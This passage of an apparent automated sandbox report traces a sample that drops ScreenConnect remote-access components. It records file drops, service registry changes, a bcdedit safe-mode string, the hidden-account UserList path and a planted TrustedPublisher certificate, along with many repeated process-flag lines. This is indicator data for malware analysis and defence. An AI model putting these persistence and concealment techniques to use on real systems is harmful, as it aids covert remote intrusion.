                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF887CC3F3A pushad ; retf 10_2_00007FF887CC3F3B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE2966 push esi; iretd 13_2_00007FF887FE296D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE2207 push esi; iretd 13_2_00007FF887FE2208
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE228B push esi; iretd 13_2_00007FF887FE228C
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE2385 push esi; iretd 13_2_00007FF887FE2386
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE2CC7 push edi; iretd 13_2_00007FF887FE2CC8
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE7D84 push ss; iretd 13_2_00007FF887FE7D85
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE67DD push edi; iretd 13_2_00007FF887FE689F
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF887FE1FEC push esi; iretd 13_2_00007FF887FE1FED
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.ClientService.exeJump to dropped file
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (ff0619b3-cdda-4e74-9760-149d39b5b1c0)

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769693267.000000001BC32000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.1764722786.0000000002F42000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.2595768885.0000000000D20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.2596143693.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
